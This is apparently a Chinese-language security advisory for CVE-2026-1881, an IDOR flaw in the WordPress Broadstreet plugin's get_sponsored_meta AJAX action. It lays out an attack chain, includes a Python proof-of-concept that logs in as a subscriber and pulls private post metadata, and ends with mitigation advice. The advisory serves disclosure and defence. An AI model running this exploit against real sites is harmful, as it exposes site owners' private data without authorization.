CVE-2026-1881 CVSS 4.3 中危

CVE-2026-1881: WordPress Broadstreet插件IDOR漏洞

披露日期: 2026-05-21

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-1881

漏洞类型

不安全的直接对象引用 (IDOR)

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

WordPress Broadstreet Plugin

漏洞概述

WordPress Broadstreet插件在1.52.2及之前的所有版本中存在不安全的直接对象引用（IDOR）漏洞。由于get_sponsored_meta AJAX操作未对用户控制的key进行验证，拥有订阅者及以上权限的经过身份验证的攻击者可以利用该漏洞泄露任意私有文章的元数据，造成信息泄露风险。

技术细节

该漏洞源于WordPress Broadstreet插件中的get_sponsored_meta AJAX action处理逻辑存在缺陷。插件在处理该请求时，直接使用了用户提供的参数（如post ID或meta key）来查询数据库，而未对当前用户是否有权限访问该特定对象进行严格的权限校验。攻击者只需拥有最低权限（如订阅者），即可构造特制的AJAX请求，指定任意的文章ID和元数据键值。服务器端在接收到请求后，直接返回对应的元数据内容，导致敏感信息（如私有文章的设置、作者信息等）被非授权获取。这属于典型的IDOR漏洞，绕过了WordPress的访问控制机制。

攻击链分析

STEP 1

步骤1：获取低权限账户

攻击者注册或入侵一个具有订阅者（Subscriber）及以上权限的WordPress账户。

STEP 2

步骤2：识别目标ID

攻击者枚举或猜测目标站点的文章ID（Post ID），特别是私有文章。

STEP 3

步骤3：发送恶意请求

攻击者使用已认证的会话，向wp-admin/admin-ajax.php发送POST请求，指定action为get_sponsored_meta，并传入目标post_id。

STEP 4

步骤4：获取敏感数据

服务器端因缺少权限校验，直接返回该文章的私有元数据，攻击者成功获取信息。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Exploit Title: WordPress Broadstreet Plugin < 1.52.2 - IDOR (Authenticated)
# CVE: CVE-2026-1881

target_url = "http://target-wordpress.com/wp-admin/admin-ajax.php"
username = "subscriber"
password = "password"

session = requests.Session()

# Step 1: Authenticate as a low-privileged user
login_data = {
    'log': username,
    'pwd': password,
    'redirect_to': 'http://target-wordpress.com/wp-admin/',
    'wp-submit': 'Log In',
}
session.post("http://target-wordpress.com/wp-login.php", data=login_data)

# Step 2: Exploit IDOR in get_sponsored_meta action
# Attempt to access metadata for post ID 1 (usually private or sensitive)
payload = {
    'action': 'get_sponsored_meta',
    'post_id': '1', 
}

response = session.post(target_url, data=payload)

if response.status_code == 200:
    print(f"[+] Exploit successful! Leaked data:")
    print(response.text)
else:
    print("[-] Exploit failed or target patched.")

影响范围

Broadstreet <= 1.52.2

防御指南

临时缓解措施

如果无法立即升级插件，建议暂时禁用Broadstreet插件以阻断攻击路径。或者配置Web应用防火墙（WAF）规则，拦截包含action=get_sponsored_meta的异常POST请求。同时，管理员应审查用户权限，确保仅信任用户拥有内容访问权。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表